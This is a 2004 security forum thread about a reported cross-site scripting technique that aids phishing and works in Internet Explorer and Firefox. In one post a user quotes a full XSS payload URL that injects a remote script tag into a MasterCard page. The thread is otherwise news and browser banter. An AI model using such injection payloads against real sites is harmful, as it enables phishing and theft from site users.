New Phishing Technique Works on Multiple Browsers

Discussion in 'other security issues & news' started by ronjor, Jul 19, 2004.

Thread Status:
Not open for further replies.
  1. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    177,032
    Location:
    Texas
    A British Web developer has revealed a new form of a cross-site scripting, or XSS, attack that facilitates phishing activities.

    The attack, demonstrated by the developer on his own site, allows an attacker to execute scripts in the context of another Web site. Testing by eWEEK.com indicates that the attack works on both Internet Explorer on Windows XP with Service Pack 2 (Release Candidate 2) and on the Mozilla Firefox 0.9.1 browser



    http://tinyurl.com/5o27q
     
    ronjor, Jul 19, 2004
    #1
  2. Disappointed

    Disappointed Guest

    This works on firefox too?

    I want my money back :)
     
    Disappointed, Jul 19, 2004
    #2
  3. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    177,032
    Location:
    Texas
    You couldn't get Firefox off my machine with a blow torch!! :D Phishing or no phishing.
     
    ronjor, Jul 19, 2004
    #3
  4. Eldar

    Eldar Registered Member

    Joined:
    Jul 12, 2004
    Posts:
    2,126
    Location:
    Vilvoorde (Belgium)
    o_O What about Mozilla Firefox 0.9.2?
     
    Eldar, Jul 19, 2004
    #4
  5. Pigman

    Pigman Registered Member

    Joined:
    May 15, 2004
    Posts:
    381
    Yep, 0.9.2 too. :p

    How about Opera and OffByOne?
     
    Pigman, Jul 19, 2004
    #5
  6. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium -Li?ge
    Hello,

    On IE6 SP2 and Opera v7.52, you see the full link :

    http://www.mastercard.com/fac/facStart.do?productId="><script%20src='http://www.zapthedingbat.com/security/scriptinjection/mastercard.js'></script>

    Not a big issue thus.
     
    JacK, Jul 20, 2004
    #6
  7. Pigman

    Pigman Registered Member

    Joined:
    May 15, 2004
    Posts:
    381
    Wait a minute, Jack... Do you mean that you see the full link on mouse-over, or in the address bar when you're actually on the bogus page? Because I think Firefox 0.9.2 shows the address when you're on the faked page...

    Maybe this isn't such a big issue for more careful users.
     
    Pigman, Jul 21, 2004
    #7
  8. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,934
    Location:
    SW. Oklahoma
    I didn't see opera 7.53 mentioned in the article at the link in ronjor's post
     
    bigc73542, Jul 21, 2004
    #8
  9. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    177,032
    Location:
    Texas
    ronjor, Jul 21, 2004
    #9
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...